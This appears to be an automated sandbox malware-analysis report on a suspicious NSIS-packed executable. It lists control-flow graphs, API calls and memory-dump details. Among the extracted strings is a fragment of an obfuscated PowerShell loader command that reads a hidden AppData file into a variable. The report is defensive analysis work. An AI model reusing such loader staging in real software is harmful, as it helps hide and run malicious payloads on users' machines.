3347 403f95 19 API calls 3342->3347 3362 403e60 DestroyWindow 3342->3362 3345 403bd4 3343->3345 3344->3346 3345->3328 3345->3346 3346->3337 3348 403d48 GetDlgItem 3347->3348 3349 403d65 ShowWindow KiUserCallbackDispatcher 3348->3349 3350 403d5d 3348->3350 3371 403fb7 KiUserCallbackDispatcher 3349->3371 3350->3349 3352 403d8f EnableWindow 3355 403da3 3352->3355 3353 403da8 GetSystemMenu EnableMenuItem SendMessageW 3354 403dd8 SendMessageW 3353->3354 3353->3355 3354->3355 3355->3353 3372 403fca SendMessageW 3355->3372 3373 405d46 lstrcpynW 3355->3373 3358 403e06 lstrlenW 3359 405d68 18 API calls 3358->3359 3360 403e1c SetWindowTextW 3359->3360 3361 401389 2 API calls 3360->3361 3361->3342 3362->3321 3363 403e7a CreateDialogParamW 3362->3363 3363->3321 3364 403ead 3363->3364 3365 403f95 19 API calls 3364->3365 3366 403eb8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3365->3366 3367 401389 2 API calls 3366->3367 3368 403efe 3367->3368 3368->3316 3369 403f06 ShowWindow 3368->3369 3370 403fe1 SendMessageW 3369->3370 3370->3321 3371->3352 3372->3355 3373->3358 3390 40173f 3391 402ad0 18 API calls 3390->3391 3392 401746 3391->3392 3393 4059fe 2 API calls 3392->3393 3394 40174d 3393->3394 3395 4059fe 2 API calls 3394->3395 3395->3394 4083 4026bf 4084 4026c6 4083->4084 4085 40295d 4083->4085 4086 4026cc FindClose 4084->4086 4086->4085

                                                                                                Executed Functions

                                                                                                Function 004031DD Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335stringfilecomCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 4031dd-403273 #17 SetErrorMode OleInitialize call 4060b0 SHGetFileInfoW call 405d46 GetCommandLineW call 405d46 GetModuleHandleW 7 403275-40327c 0->7 8 40327d-40328f call 4057db CharNextW 0->8 7->8 11 403358-40335e 8->11 12 403294-40329a 11->12 13 403364 11->13 14 4032a3-4032a9 12->14 15 40329c-4032a1 12->15 16 403378-403392 GetTempPathW call 4031a9 13->16 17 4032b0-4032b4 14->17 18 4032ab-4032af 14->18 15->14 15->15 26 403394-4033b2 GetWindowsDirectoryW lstrcatW call 4031a9 16->26 27 4033ea-403404 DeleteFileW call 402cff 16->27 20 403349-403354 call 4057db 17->20 21 4032ba-4032c0 17->21 18->17 20->11 35 403356-403357 20->35 24 4032c2-4032c9 21->24 25 4032d5-4032ec 21->25 30 4032d0 24->30 31 4032cb-4032ce 24->31 32 40331a-403330 25->32 33 4032ee-403304 25->33 26->27 44 4033b4-4033e4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031a9 26->44 40 40349a-4034a9 call 403640 OleUninitialize 27->40 41 40340a-403410 27->41 30->25 31->25 31->30 32->20 39 403332-403347 32->39 33->32 37 403306-40330e 33->37 35->11 42 403310-403313 37->42 43 403315 37->43 39->20 45 403366-403373 call 405d46 39->45 57 4035a5-4035ab 40->57 58 4034af-4034bf call 405529 ExitProcess 40->58 46 403412-40341d call 4057db 41->46 47 40348a-403491 call 40371a 41->47 42->32 42->43 43->32 44->27 44->40 45->16 61 403454-40345e 46->61 62 40341f-403430 46->62 56 403496 47->56 56->40 59 403628-403630 57->59 60 4035ad-4035ca call 4060b0 * 3 57->60 66 403632 59->66 67 403636-40363a ExitProcess 59->67 92 403614-40361f ExitWindowsEx 60->92 93 4035cc-4035ce 60->93 68 403460-40346e call 4058b6 61->68 69 4034c5-4034df lstrcatW lstrcmpiW 61->69 65 403432-403434 62->65 72 403436-40344c 65->72 73 40344e-403452 65->73 66->67 68->40 83 403470-403486 call 405d46 * 2 68->83 69->40 75 4034e1-4034f7 CreateDirectoryW SetCurrentDirectoryW 69->75 72->61 72->73 73->61 73->65 78 403504-40352d call 405d46 75->78 79 4034f9-4034ff call 405d46 75->79 88 403532-40354e call 405d68 DeleteFileW 78->88 79->78 83->47 98 403550-403560 CopyFileW 88->98 99 40358f-403597 88->99 92->59 96 403621-403623 call 40140b 92->96 93->92 97 4035d0-4035d2 93->97 96->59 97->92 101 4035d4-4035e6 GetCurrentProcess 97->101 98->99 103 403562-403582 call 405be0 call 405d68 call 4054c8 98->103 99->88 102 403599-4035a0 call 405be0 99->102 101->92 107 4035e8-40360a 101->107 102->40 103->99 115 403584-40358b CloseHandle 103->115 107->92 115->99
                                                                                                APIs
                                                                                                • #17.COMCTL32 ref: 004031FC
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403207
                                                                                                • OleInitialize.OLE32(00000000), ref: 0040320E
                                                                                                  • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                                  • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                                  • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                                • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236
                                                                                                  • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                                                • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",00000000), ref: 0040325E
                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",00000020), ref: 00403285
                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 004033EF
                                                                                                • OleUninitialize.OLE32(?), ref: 0040349F
                                                                                                • ExitProcess.KERNEL32 ref: 004034BF
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",00000000,?), ref: 004034CB
                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",00000000,?), ref: 004034D7
                                                                                                • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
                                                                                                • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets,?), ref: 00403544
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\LMSxhK1u8Z.exe,0042A9B8,00000001), ref: 00403558
                                                                                                • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
                                                                                                • ExitProcess.KERNEL32 ref: 0040363A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                • String ID: "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets$"C:\Users\user\Desktop\LMSxhK1u8Z.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic$C:\Users\user\Desktop$C:\Users\user\Desktop\LMSxhK1u8Z.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                • API String ID: 4107622049-1429106303
                                                                                                • Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                                                • Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
                                                                                                • Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                                                • Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E
                                                                                                Function 00405139 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 116 405139-405154 117 4052e5-4052ec 116->117 118 40515a-405223 GetDlgItem * 3 call 403fca call 404897 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 119 405316-405323 117->119 120 4052ee-405310 GetDlgItem CreateThread CloseHandle 117->120 136 405241-405244 118->136 137 405225-40523f SendMessageW * 2 118->137 123 405341-405348 119->123 124 405325-40532b 119->124 120->119 128 40534a-405350 123->128 129 40539f-4053a3 123->129 126 405363-40536c call 403ffc 124->126 127 40532d-40533c ShowWindow * 2 call 403fca 124->127 140 405371-405375 126->140 127->123 133 405352-40535e call 403f6e 128->133 134 405378-405388 ShowWindow 128->134 129->126 131 4053a5-4053a8 129->131 131->126 138 4053aa-4053bd SendMessageW 131->138 133->126 141 405398-40539a call 403f6e 134->141 142 40538a-405393 call 404ffa 134->142 144 405254-40526b call 403f95 136->144 145 405246-405252 SendMessageW 136->145 137->136 146 4054c1-4054c3 138->146 147 4053c3-4053e4 CreatePopupMenu call 405d68 AppendMenuW 138->147 141->129 142->141 155 4052a1-4052c2 GetDlgItem SendMessageW 144->155 156 40526d-405281 ShowWindow 144->156 145->144 146->140 153 4053e6-4053f7 GetWindowRect 147->153 154 4053f9-4053ff 147->154 157 405402-40541a TrackPopupMenu 153->157 154->157 155->146 160 4052c8-4052e0 SendMessageW * 2 155->160 158 405290 156->158 159 405283-40528e ShowWindow 156->159 157->146 161 405420-405437 157->161 162 405296-40529c call 403fca 158->162 159->162 160->146 163 40543c-405457 SendMessageW 161->163 162->155 163->163 165 405459-40547c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 166 40547e-4054a5 SendMessageW 165->166 166->166 167 4054a7-4054bb GlobalUnlock SetClipboardData CloseClipboard 166->167 167->146
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405198
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004051A7
                                                                                                • GetClientRect.USER32(?,?), ref: 004051E4
                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004051EC
                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405288
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052A9
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004051B6
                                                                                                  • Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052FB
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000050CD,00000000), ref: 00405309
                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00405310
                                                                                                • ShowWindow.USER32(00000000), ref: 00405334
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405339
                                                                                                • ShowWindow.USER32(00000008), ref: 00405380
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
                                                                                                • CreatePopupMenu.USER32 ref: 004053C3
                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
                                                                                                • GetWindowRect.USER32(?,?), ref: 004053EB
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
                                                                                                • OpenClipboard.USER32(00000000), ref: 0040545A
                                                                                                • EmptyClipboard.USER32 ref: 00405460
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405476
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004054AA
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
                                                                                                • CloseClipboard.USER32 ref: 004054BB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                • String ID: {
                                                                                                • API String ID: 590372296-366298937
                                                                                                • Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                                                • Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
                                                                                                • Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                                                • Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58
                                                                                                Function 00405D68 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 409 405d68-405d73 410 405d75-405d84 409->410 411 405d86-405d9c 409->411 410->411 412 405da2-405daf 411->412 413 405fb4-405fba 411->413 412->413 414 405db5-405dbc 412->414 415 405fc0-405fcb 413->415 416 405dc1-405dce 413->416 414->413 418 405fd6-405fd7 415->418 419 405fcd-405fd1 call 405d46 415->419 416->415 417 405dd4-405de0 416->417 421 405fa1 417->421 422 405de6-405e22 417->422 419->418 423 405fa3-405fad 421->423 424 405faf-405fb2 421->424 425 405f42-405f46 422->425 426 405e28-405e33 GetVersion 422->426 423->413 424->413 429 405f48-405f4c 425->429 430 405f7b-405f7f 425->430 427 405e35-405e39 426->427 428 405e4d 426->428 427->428 434 405e3b-405e3f 427->434 431 405e54-405e5b 428->431 435 405f5c-405f69 call 405d46 429->435 436 405f4e-405f5a call 405c8d 429->436 432 405f81-405f89 call 405d68 430->432 433 405f8e-405f9f lstrlenW 430->433 438 405e60-405e62 431->438 439 405e5d-405e5f 431->439 432->433 433->413 434->428 442 405e41-405e45 434->442 446 405f6e-405f77 435->446 436->446 444 405e64-405e81 call 405c13 438->444 445 405e9e-405ea1 438->445 439->438 442->428 447 405e47-405e4b 442->447 452 405e86-405e8a 444->452 450 405eb1-405eb4 445->450 451 405ea3-405eaf GetSystemDirectoryW 445->451 446->433 449 405f79 446->449 447->431 453 405f3a-405f40 call 405fda 449->453 455 405eb6-405ec4 GetWindowsDirectoryW 450->455 456 405f1f-405f21 450->456 454 405f23-405f27 451->454 457 405e90-405e99 call 405d68 452->457 458 405f29-405f2d 452->458 453->433 454->453 454->458 455->456 456->454 459 405ec6-405ed0 456->459 457->454 458->453 462 405f2f-405f35 lstrcatW 458->462 464 405ed2-405ed5 459->464 465 405eea-405f00 SHGetSpecialFolderLocation 459->465 462->453 464->465 466 405ed7-405ede 464->466 467 405f02-405f19 SHGetPathFromIDListW CoTaskMemFree 465->467 468 405f1b 465->468 470 405ee6-405ee8 466->470 467->454 467->468 468->456 470->454 470->465
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405E2B
                                                                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EA9
                                                                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EBC
                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
                                                                                                • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F06
                                                                                                • CoTaskMemFree.OLE32(?), ref: 00405F11
                                                                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
                                                                                                • lstrlenW.KERNEL32(: Completed,00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405F8F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                • String ID: "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets$: Completed$Frisurens$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                • API String ID: 900638850-282594308
                                                                                                • Opcode ID: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                                                                • Instruction ID: b81ff5d6b4e7f68ebbf9f5a60334f295c7cfdbca171d810927ba552bda20cf23
                                                                                                • Opcode Fuzzy Hash: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                                                                • Instruction Fuzzy Hash: E761C071A00906ABDF209F25CD45AAF37A5EF55314F14803BE585BA2E0D77D8A82CF8D
                                                                                                Function 004055D5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 471 4055d5-4055fb call 4058b6 474 405614-40561b 471->474 475 4055fd-40560f DeleteFileW 471->475 477 40561d-40561f 474->477 478 40562e-40563e call 405d46 474->478 476 4057a7-4057ab 475->476 479 405755-40575a 477->479 480 405625-405628 477->480 486 405640-40564b lstrcatW 478->486 487 40564d-40564e call 4057fa 478->487 479->476 482 40575c-40575f 479->482 480->478 480->479 484 405761-405767 482->484 485 405769-405771 call 406089 482->485 484->476 485->476 494 405773-405787 call 4057ae call 40558d 485->494 489 405653-405657 486->489 487->489 492 405663-405669 lstrcatW 489->492 493 405659-405661 489->493 495 40566e-40568b lstrlenW FindFirstFileW 492->495 493->492 493->495 510 405789-40578c 494->510 511 40579f-4057a2 call 404ffa 494->511 496 405691-4056aa call 4057db 495->496 497 40574a-40574e 495->497 504 4056b5-4056b9 496->504 505 4056ac-4056b0 496->505 497->479 501 405750 497->501 501->479 508 4056d0-4056de call 405d46 504->508 509 4056bb-4056c2 504->509 505->504 507 4056b2 505->507 507->504 521 4056e0-4056e8 508->521 522 4056f5-405700 call 40558d 508->522 513 4056c4-4056c8 509->513 514 405729-40573b FindNextFileW 509->514 510->484 516 40578e-40579d call 404ffa call 405be0 510->516 511->476 513->508 517 4056ca-4056ce 513->517 514->496 519 405741-405744 FindClose 514->519 516->476 517->508 517->514 519->497 521->514 525 4056ea-4056f3 call 4055d5 521->525 530 405721-405724 call 404ffa 522->530 531 405702-405705 522->531 525->514 530->514 533 405707-405717 call 404ffa call 405be0 531->533 534 405719-40571f 531->534 533->514 534->514
                                                                                                APIs
                                                                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 004055FE
                                                                                                • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 00405646
                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 00405669
                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 0040566F
                                                                                                • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 0040567F
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405744
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3
                                                                                                • "C:\Users\user\Desktop\LMSxhK1u8Z.exe", xrefs: 004055DE
                                                                                                • \*.*, xrefs: 00405640
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
